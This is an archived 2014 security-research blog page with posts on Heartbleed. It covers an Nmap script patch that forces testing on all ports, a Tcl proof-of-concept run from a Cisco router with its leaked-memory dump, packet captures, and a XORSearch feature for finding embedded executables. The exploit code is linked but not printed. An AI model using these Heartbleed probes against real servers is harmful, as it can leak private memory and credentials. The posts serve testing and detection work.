Didier Stevens

Thursday 24 April 2014

ssl-hearbleed.nse mod

Filed under: Networking,Vulnerabilities — Didier Stevens @ 7:36

YAHP: Yet Another Heartbleed Post

Update: Daniel Miller told me this modification is not necessary. You can force a script to run on all open ports, regardless of the result of the portrule function, by prefixing the scriptname with a +. Like this: nmap -p443 –script +ssl-heartbleed cloudflarechallenge.com

 

I’ve read that some people are surprised by Nmap’s ssl-heartbleed.nse script behavior: that it will not test all ports.

The script is designed to test only ports with ssl. This is encoded in the portrule function:

portrule = function(host, port)
  return shortport.ssl(host, port) or sslcert.isPortSupported(port)
end

It’s explained here that you should do a service version detection scan (-sV) so that the script will test unusual ports.

If you don’t want to do a service version detection scan, you could change the portrule function to always return true, hence forcing a test on all open ports.

But this solution is not desired, it’s better to use a script argument to be able to force testing when really necessary.

I copied ssl-heartbleed.nse (SHA1 7540E31EF133226648616DF6534A8BD58C35A3D6) to ssl-heartbleed-force.nse and changed the portrule function like this:

49c49
<   return shortport.ssl(host, port) or sslcert.isPortSupported(port)
---
>   return stdnse.get_script_args(SCRIPT_NAME .. ".force") or shortport.ssl(host, port) or sslcert.isPortSupported(port)

With this change, ssl-heartbleed-force will behave exactly like ssl-heartbleed, unless you use script argument ssl-heartbleed-force.force, like this:

nmap --p443 --script ssl-heartbleed-force --script-args ssl-heartbleed-force.force cloudflarechallenge.com

This script argument will force the test on all open ports.

Friday 18 April 2014

Heartbleed: Testing From a Cisco IOS Router – ssltest.tcl

Filed under: My Software,Networking,Vulnerabilities — Didier Stevens @ 9:12

I wanted to know if I could exploit Heartbleed CVE-2014-0160 from a Cisco IOS router. So I wrote a Tcl script based on Jared Stafford’s Python program ssltest.py.

Turns out I can:

router#tclsh ssltest.tcl                         
Opening connection

Translating "cloudflarechallenge.com"...domain server (8.8.8.8) [OK]
Sending handshake
Received TLS record Type: 0x16 Version: 0x0301 First data byte: 0x02 Length: 66
Received TLS record Type: 0x16 Version: 0x0301 First data byte: 0x0b Length: 6113
Received TLS record Type: 0x16 Version: 0x0301 First data byte: 0x0c Length: 331
Received TLS record Type: 0x16 Version: 0x0301 First data byte: 0x0e Length: 4
Sending malformed heartbeat request
Heartbeat response received
Received TLS record Type: 0x18 Version: 0x0301 First data byte: 0x02 Length: 16384
Heartbeat response dump:
02 40 00 6b c1 f4 ab d9  47 45 54 20 2f 20 48 54  .@.kC^AC4B+C^Y GET / HT
54 50 2f 31 2e 31 0d 0a  48 6f 73 74 3a 20 63 6c  TP/1.1.. Host: cl
6f 75 64 66 6c 61 72 65  63 68 61 6c 6c 65 6e 67  oudflare challeng
65 2e 63 6f 6d 0d 0a 43  6f 6e 6e 65 63 74 69 6f  e.com..C onnectio
6e 3a 20 6b 65 65 70 2d  61 6c 69 76 65 0d 0a 0d  n: keep- alive...
0a 2b 14 0d 6a c0 13 32  44 c1 a9 0f bf 5d dc 57  .+..jC^@.2 DC^AB).B?]C^\W
19 18 03 03 00 1b 34 f3  65 6b c1 f4 ab d8 01 ff  ......4C3 ekC^AC4B+C^X.C?
ff a6 8b c5 e2 2a b0 d6  b3 ff bd fc 9c 67 a7 83  C?B&.C^EC"*B0C^V B3C?B=C<.gB'.
40 72 10 38 5e 01 ff ff  f1 ca d2 f6 be 81 23 41  @r.8^.C?C? C1C C^RC6B>.#A
fb 8d 53 15 42 aa 52 bd  9e 5f 61 0a 08 08 08 08  C;.S.BB*RB= ._a.....
08 08 08 08 08 00 19 00  0b 00 0c 00 18 00 09 00  ........ ........
0a 00 16 00 17 00 08 00  06 00 07 00 14 00 15 00  ........ ........
04 00 05 00 12 00 13 00  01 00 02 00 03 00 0f 00  ........ ........
10 00 11 00 23 00 00 00  0f 00 01 01 0e 00 0d 00  ....#... ........
19 00 0b 00 0c 00 18 00  09 00 0a 00 16 00 17 00  ........ ........
08 00 06 00 07 00 14 00  15 00 04 00 05 00 12 00  ........ ........
13 00 01 00 02 00 03 00  0f 00 10 00 11 00 23 00  ........ ......#.
00 00 0d 00 20 00 1e 06  01 06 02 06 03 05 01 05  .... ... ........
02 05 03 04 01 04 02 04  03 03 01 03 02 03 03 02  ........ ........
01 02 02 02 03 00 0f 00  01 01 00 15 00 c2 00 00  ........ .....C^B..
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ........ ........

[omitted]

00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ........ ........
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ........ ........
                                                                   
Closing connection

router#

Tested on: Cisco IOS Software, C880 Software (C880DATA-UNIVERSALK9-M), Version 15.1(4)M3, RELEASE SOFTWARE (fc1)

If you are interested, here is my Tcl PoC ssltest.tcl:
ssltest.zip (https)
MD5: 1B50D6A10637BB6472ED541733BBE68D
SHA256: DA744643CF06645DA9C27A7DD62853E15123D7481AE5D6776E6393A6312847E1

Wednesday 16 April 2014

nmap Grepable Script Output – Heartbleed

Filed under: My Software,Networking — Didier Stevens @ 0:11

Peter was looking for a way to make nmap’s heartbleed script output grepable. He ended up hacking the script.

I propose a method without modification of the NSE heartbleed script.

Some time ago I recommended to include xml output with your nmap scans.

Script output is included with each port element:

20140415-225839

I quickly adapted an old program to produce a Python script to generate a CSV file from XML with one line per host, including only ports with script output (any script, not only ssl-heartbleed).

Like this:

address;vendor;hostname;port;state;service;script;output
10.10.10.10;;heartbleed.local.net;443;open;https;ssl-heartbleed;u'\n  VULNERABLE:\n  The Heartbleed Bug ...'

nmap-xml-script-output_V0_0_1.zip (https)
MD5: 772B6371C1F5E27E68D9BF14955A02D4
SHA256: C86E42E7FA8EFA42C60062759E69DC8DE7F017D9113CF304D9515ACA59815790

Thursday 10 April 2014

Heartbleed: Packet Capture – Full TLS

Filed under: Networking,Vulnerabilities — Didier Stevens @ 22:34

Yesterday I posted my heartbleed packet capture with an unencrypted heartbeat record.

Now I post a capture with full TLS session setup, hence here the heartbeat records are encrypted. I use heartbleed.c by HackerFantastic.

heartbleed_packet_capture_tls.zip (https)
MD5: 7D19146C2ACC28AFAD6E1FD217E908BB
SHA256: 7FDECDD05269731EDD57FFEE24323C672D620A533CD412089F055D6266C76164

Wednesday 9 April 2014

Heartbleed: Packet Capture

Filed under: Networking,Vulnerabilities — Didier Stevens @ 21:39

I could call this a cardiogram, but let’s not get carried away…

I took a packet capture of the heartbleed bug (CVE-2014-0160) in action: I have OpenSSL 1.0.1 14 March 2012 running on Apache2 (Ubuntu, VMware) and executed Jared Stafford’s ssltest.py script. One small modification to the script: I removed line 132 (the script transmits 2 heartbeat requests, I want only 1 request).

PS: as I expected, I didn’t find an entry in the Apache logs for this request.

heartbleed_packet_capture.zip (https)
MD5: 8302CDF315A91DD6FC32BB81AE0FB80D
SHA256: 7029CF9C2AF3CE7649501D15AD58439513F02B1B9ECD23343F6C6A6B2D87D344
20140409-231823

PDF Rainbow Tables

Filed under: Encryption,PDF — Didier Stevens @ 0:57

Looks I hadn’t blogged this video:

Friday 4 April 2014

Announcement: Wireshark Lua Dissectors

Filed under: Announcement,My Software,Networking,Wireshark — Didier Stevens @ 10:18

To promote my Hack In The Box Wireshark training, I’ll start to publish some Lua dissectors.

Here is a screenshot of my TCP Flags dissector. It was generated (and adapted) with my Wireshark Lua dissector generator. It displays TCP flags like Snort does.

You can clearly see the SYN – SYN/ACK – ACK phase of the first TCP connection (packets 1, 2 and 3).

20140404-112631

Thursday 27 March 2014

Recorded “Network Device Forensics” Talk

Filed under: Forensics,My Software,Networking — Didier Stevens @ 0:27

I recorded my “Network Device Forensics” talk.

Supporting media:

Wednesday 26 March 2014

“Network Device Forensics” Talk

Filed under: Networking — Didier Stevens @ 10:28

I’m talking at infosecurity.be today: “Network Device Forensics”.

Supporting media:

Thursday 20 March 2014

XORSearch: Finding Embedded Executables

Filed under: My Software,Update — Didier Stevens @ 10:58

Someone mentioned on a forum that he found a picture with an embedded, XORed executable. You can easily identify such embedded executables by xorsearching for the string “This program must be run under Win32″. But if the author or compiler modifies this DOS-stub string, you will not find it.

That’s how I got the idea to add an option to search for PE-files: search for string MZ, read the offset to the IMAGE_NT_HEADER structure (e_lfanew), and check if it starts with string PE.

Example: XORSearch.exe -p test.jpg

Found XOR A2 position 00005D1D: 000000E8 ........!..L.!This program cannot be r
Found XOR A2 position 0001221D: 00000108 ........!..L.!This program cannot be r

We found 2 embedded executables in test.jpg (XOR key A2). Remark we didn’t provide a search string, only option -p.

XORSearch also reports the value of e_lfanew and the string found in the DOS-stub. This allows you to inspect the results for false positives.

This can also be used on unencoded files, like this installation file:

XORSearch.exe -p c8400.msi
Found XOR 00 position 00236400: 000000E8 ........!..L.!This program cannot be r
Found XOR 00 position 00286000: 00000100 ........!..L.!This program cannot be r
Found XOR 00 position 00346800: 000000F8 ........!..L.!This program cannot be r
Found XOR 00 position 003A7200: 00000080 ........!..L.!This program cannot be r
Found XOR 00 position 003AD200: 00000080 ........!..L.!This program cannot be r
Found XOR 00 position 004B4800: 00000108 ........!..L.!This program cannot be r
Found XOR 00 position 004DE600: 000000F8 ........!..L.!This program cannot be r
Found XOR 00 position 004FE200: 000000E0 ........!..L.!This program cannot be r
Found XOR 00 position 00520C00: 000000E0 ........!..L.!This program cannot be r
Found XOR 00 position 00542000: 000000E0 ........!..L.!This program cannot be r
Found XOR 00 position 00562400: 00000100 ........!..L.!This program cannot be r
Found XOR 00 position 0058F800: 000000E0 ........!..L.!This program cannot be r

Finally, I added option -e (exclude). This excludes a particular byte-value from encoding. If you suspect a file is XOR encoded, but that byte 0×00 is not encoded, you use option -e 0×00.

XORSearch_V1_10_0.zip (https)
MD5: 23809A03C63914B0742B7F75B73E1597
SHA256: 97BFBC5E8C59F60E10ABDA2D65DF4200B10BE14662D4A447797B341C9AAE17D8

Next Page »

The Rubric Theme. Blog at WordPress.com.

Follow

Get every new post delivered to your Inbox.

Join 199 other followers